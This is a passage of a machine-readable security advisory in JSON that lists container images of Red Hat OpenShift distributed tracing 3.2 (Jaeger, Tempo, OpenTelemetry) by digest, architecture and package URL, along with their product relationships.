"rhosdt/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0_s390x", "product": { "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0_s390x", "product_id": "rhosdt/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0_s390x", "product_identification_helper": { "purl": "pkg:oci/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/tempo-gateway-opa-rhel8\u0026tag=1.0.0-10" } } }, { "category": "product_version", "name": "rhosdt/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c_s390x", "product": { "name": "rhosdt/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c_s390x", "product_id": "rhosdt/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c_s390x", "product_identification_helper": { "purl": "pkg:oci/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/tempo-operator-bundle\u0026tag=0.10.0-25" } } }, { "category": "product_version", "name": "rhosdt/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125_s390x", "product": { "name": "rhosdt/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125_s390x", "product_id": "rhosdt/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125_s390x", "product_identification_helper": { "purl": "pkg:oci/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/tempo-rhel8-operator\u0026tag=0.10.0-7" } } }, { "category": "product_version", "name": "rhosdt/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5_s390x", "product": { "name": "rhosdt/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5_s390x", "product_id": "rhosdt/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5_s390x", "product_identification_helper": { "purl": "pkg:oci/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/tempo-query-rhel8\u0026tag=0.10.0-10" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "rhosdt/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6_ppc64le", "product": { "name": "rhosdt/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6_ppc64le", "product_id": "rhosdt/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-agent-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149_ppc64le", "product": { "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149_ppc64le", "product_id": "rhosdt/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976_ppc64le", "product": { "name": "rhosdt/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976_ppc64le", "product_id": "rhosdt/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-collector-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc_ppc64le", "product": { "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc_ppc64le", "product_id": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8\u0026tag=1.57.0-7" } } }, { "category": "product_version", "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5_ppc64le", "product": { "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5_ppc64le", "product_id": "rhosdt/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8\u0026tag=1.57.0-7" } } }, { "category": "product_version", "name": "rhosdt/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195_ppc64le", "product": { "name": "rhosdt/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195_ppc64le", "product_id": "rhosdt/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-ingester-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917_ppc64le", "product": { "name": "rhosdt/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917_ppc64le", "product_id": "rhosdt/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-operator-bundle\u0026tag=1.57.0-26" } } }, { "category": "product_version", "name": "rhosdt/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202_ppc64le", "product": { "name": "rhosdt/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202_ppc64le", "product_id": "rhosdt/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-rhel8-operator\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead_ppc64le", "product": { "name": "rhosdt/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead_ppc64le", "product_id": "rhosdt/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead_ppc64le", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/jaeger-query-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le", "product": { "name": "rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le", "product_id": "rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-collector-rhel8\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9_ppc64le", "product": { "name": "rhosdt/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9_ppc64le", "product_id": "rhosdt/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9_ppc64le", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-operator-bundle\u0026tag=0.102.0-5" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4_ppc64le", "product": { "name": "rhosdt/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4_ppc64le", "product_id": "rhosdt/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4_ppc64le", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-rhel8-operator\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd_ppc64le", "product": { "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd_ppc64le", "product_id": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd_ppc64le", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-target-allocator-rhel8\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7_ppc64le", "product": { "name": "rhosdt/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7_ppc64le", "product_id": "rhosdt/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7_ppc64le", "product_identification_helper": { "purl": "pkg:oci/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/tempo-rhel8\u0026tag=2.4.2-4" } } }, { "category": "product_version", "name": "rhosdt/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf_ppc64le", "product": { "name": "rhosdt/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf_ppc64le", "product_id": "rhosdt/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf_ppc64le", "product_identification_helper": { "purl": "pkg:oci/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/tempo-gateway-rhel8\u0026tag=1.0.0-9" } } }, { "category": "product_version", "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f_ppc64le", "product": { "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f_ppc64le", "product_id": "rhosdt/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f_ppc64le", "product_identification_helper": { "purl": "pkg:oci/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/tempo-gateway-opa-rhel8\u0026tag=1.0.0-10" } } }, { "category": "product_version", "name": "rhosdt/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7_ppc64le", "product": { "name": "rhosdt/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7_ppc64le", "product_id": "rhosdt/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7_ppc64le", "product_identification_helper": { "purl": "pkg:oci/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/tempo-operator-bundle\u0026tag=0.10.0-25" } } }, { "category": "product_version", "name": "rhosdt/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71_ppc64le", "product": { "name": "rhosdt/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71_ppc64le", "product_id": "rhosdt/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71_ppc64le", "product_identification_helper": { "purl": "pkg:oci/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/tempo-rhel8-operator\u0026tag=0.10.0-7" } } }, { "category": "product_version", "name": "rhosdt/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd_ppc64le", "product": { "name": "rhosdt/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd_ppc64le", "product_id": "rhosdt/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd_ppc64le", "product_identification_helper": { "purl": "pkg:oci/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd?arch=ppc64le\u0026repository_url=registry.redhat.io/rhosdt/tempo-query-rhel8\u0026tag=0.10.0-10" } } } ], "category": "architecture", "name": "ppc64le" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912_amd64" }, "product_reference": "rhosdt/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6_s390x" }, "product_reference": "rhosdt/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6_ppc64le" }, "product_reference": "rhosdt/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc_arm64" }, "product_reference": "rhosdt/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149_ppc64le" }, "product_reference": "rhosdt/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435_amd64" }, "product_reference": "rhosdt/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195_s390x" }, "product_reference": "rhosdt/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac_arm64" }, "product_reference": "rhosdt/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268_amd64" }, "product_reference": "rhosdt/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357_arm64" }, "product_reference": "rhosdt/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c_s390x" }, "product_reference": "rhosdt/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976_ppc64le" }, "product_reference": "rhosdt/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc_ppc64le" }, "product_reference": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf_amd64" }, "product_reference": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426_arm64" }, "product_reference": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753_s390x" }, "product_reference": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5_ppc64le" }, "product_reference": "rhosdt/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3_s390x" }, "product_reference": "rhosdt/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": 